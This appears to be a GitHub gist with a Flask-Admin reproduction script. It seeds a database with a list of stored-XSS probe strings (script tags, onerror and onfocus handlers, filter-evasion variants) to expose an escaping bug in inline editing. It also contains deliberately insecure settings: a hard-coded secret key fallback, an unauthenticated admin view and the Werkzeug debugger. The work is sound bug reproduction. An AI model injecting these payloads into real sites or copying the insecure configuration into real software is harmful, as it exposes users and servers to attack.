"Security Risk"
import os

from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import flask_admin as admin
from flask_admin.contrib import sqla
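# Create application
app = Flask(__name__)

# Session-signing key. The literal is only a placeholder for this local
# reproduction; set SECRET_KEY in the environment for anything else, since a
# known, hard-coded key lets anyone forge signed session cookies.
app.config['SECRET_KEY'] = os.environ.get('SECRET_KEY', '123456790')

# File-backed SQLite database in the working directory (this is NOT in-memory;
# the in-memory URI would be 'sqlite://'). The script entry point below drops
# and recreates it on every run.
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///sample_db_2.sqlite'

# Echo every SQL statement (including bound row data) to the console. Handy
# while reproducing the issue, but it leaks stored values into logs, so leave
# it off outside a throwaway setup.
app.config['SQLALCHEMY_ECHO'] = True

db = SQLAlchemy(app)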
# Flask views
@app.route('/')
def index():
    """Landing page: a single link into the Flask-Admin UI served under /admin/."""
    admin_link = '<a href="/admin/">Click me to get to Admin!</a>'
    return admin_link
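class Car(db.Model):
    """Single demo table; ``desc`` holds the hostile strings seeded at startup."""

    __tablename__ = 'cars'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    # Free text. The rows seeded in the script entry point are deliberately
    # hostile HTML/JS, so every place that renders this column must escape it.
    desc = db.Column(db.Text)

    def __unicode__(self):
        # Python 2 display hook; returns the raw desc as the row label.
        return self.desc

    # Python 3 never calls __unicode__; without __str__ a Car would display as
    # the default object repr instead of its desc. Same value, both runtimes.
    __str__ = __unicode__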
class CarAdmin(sqla.ModelView):
    """Admin view for ``Car`` with ``desc`` editable inline from the list page.

    Inline editing is the rendering path this gist exercises with the seeded
    payloads. No ``is_accessible`` override is defined, so the view is
    reachable without any authentication -- acceptable only for a local
    reproduction, never for a deployed app.
    """

    column_editable_list = ('desc',)
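# Create admin. Note that this rebinds the name ``admin`` from the flask_admin
# module (imported above) to the Admin instance; the module is not referenced
# again after this line.
admin = admin.Admin(app, name='Example: SQLAlchemy2', template_mode='bootstrap3')
# Register the view that exposes ``desc`` for inline editing.
admin.add_view(CarAdmin(Car, db.session))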
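if __name__ == '__main__':
    # Seed rows: every desc is a stored-XSS probe. They are stored verbatim; the
    # reproduction is about how the admin list renders them afterwards. Keep the
    # strings exactly as they are (odd spacing, prompt(132), etc.) -- test data.
    XSS_PROBES = [
        '<h1>hello</h1>',
        '<script>alert(123)</script>',
        '<img src=x onerror=alert(123) />',
        '<svg><script>123<1>alert(123)</script> ',
        '"><script>alert(123)</script>',
        '><script>alert(123)</script>',
        '</script><script>alert(123)</script>',
        '< / script >< script >alert(123)< / script >',
        ' onfocus=JaVaSCript:alert(123) autofocus ',
        '" onfocus=JaVaSCript:alert(123) autofocus ',
        '<sc<script>ript>alert(123)</sc</script>ript>',
        '--><script>alert(123)</script>',
        '";alert(123);t="',
        'JavaSCript:alert(123)',
        ';alert(123);',
        'src=JaVaSCript:prompt(132)',
        '"><script>alert(123);</script x="',
        '><script>alert(123);</script x=',
        '" autofocus onkeyup="javascript:alert(123)',
    ]

    # Start from a clean database on every run. drop_all() wipes every table
    # the models define -- never point SQLALCHEMY_DATABASE_URI at real data.
    db.drop_all()
    db.create_all()
    db.session.add_all([Car(desc=probe) for probe in XSS_PROBES])
    db.session.commit()

    # debug=True enables the Werkzeug interactive debugger, which lets a
    # browser execute arbitrary Python on any unhandled exception. Keep the
    # default localhost binding and never expose this process on a network.
    app.run(debug=True)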
boolbag commented Aug 20, 2015

Reproduces the flask-admin issue this gist was forked to demonstrate: with `desc` in `column_editable_list`, the seeded XSS probe strings are rendered in the inline-editable admin list view, where any missing escaping shows up as an executed `alert(123)`.
